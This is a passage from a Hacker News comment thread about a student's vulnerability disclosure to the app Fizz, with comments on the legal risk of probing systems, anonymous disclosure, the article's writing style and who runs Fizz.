         | does not hang out some sort of public permission to poke at
         | them. The upside is minimal and the downside significant. Note
         | this is a descriptive statement, not a normative statement. In
         | a perfect world... well, in a perfect world there'd be no
         | security vulnerabilities to find, but... in a perfect world
         | sure you'd never get in trouble for poking through and
         | immediately backing off, but in the real world this story just
         | happens too often. Takes all the fun right out of it. YMMV.
        
       | monksy wrote:
       | Commentary on the journalism:
       | 
       | Fantastic for calling Fizz out. "Fizz did not protect their
       | users' data. What happened next?" This isn't a "someone hacked
       | them". It's that Fizz failed to do what they promised.
       | 
        | I'm still curious to hear whether the vulnerability has been
        | retested to confirm it's been resolved.
        
       | causality0 wrote:
       | Unless you're looking to earn a bounty, always disclose testing
       | of this type anonymously. Clean device, clean wi-fi, new
        | accounts. That way, if they threaten you instead of thanking
        | you, you can just drop the exploit details publicly and wash
        | your hands of it.
        
       | borkt wrote:
       | [flagged]
        
         | archgoon wrote:
         | It's fine, particularly for a transcript. Perhaps you lack
         | decent reading skills? Quite common.
        
           | archgoon wrote:
           | [dead]
        
         | epoch_100 wrote:
         | Heh. That's not very nice. If it feels stilted, that's probably
         | because I wrote this primarily to be spoken. But ChatGPT was
         | not involved.
        
           | version_five wrote:
            | I read it, and I'm pretty much the most critical person I
            | know; I didn't see any problem with the style. I don't know
            | what that guy's talking about.
        
           | danielvf wrote:
           | Yeah, don't worry about the above complaint. The writing is
           | just fine.
        
         | Pannoniae wrote:
         | I don't think the writing is bad, but even if so, not everyone
         | is good at languages. They got the point across, didn't they?
        
         | trostaft wrote:
         | Perhaps before killing someone with a comment, you should
         | provide examples to back up your vitriol? The guidelines were
         | reposted a mere four days ago...
         | 
         | The writing felt fine to me, if a bit terse.
        
         | kjjw wrote:
         | [flagged]
        
       | aa_is_op wrote:
       | tl;dr?
        
       | nickdothutton wrote:
        | The story has greatly reduced value without knowing who the
        | individuals behind Fizz really are, so that we can avoid doing
        | business with them. It would be different if Fizz were a
        | product of a megacorporation.
        | 
        | "Keep calm" and "be responsible" and "speak to a lawyer" are
        | things I class as common sense. The gold nugget I was looking
        | for was the red flashing shipwreck buoy/marker over the names.
        
         | meepmorp wrote:
         | Ashton Cofer and Teddy Solomon, according to this article:
         | 
         | https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
        
       ___________________________________________________________________
       (page generated 2023-08-28 23:01 UTC)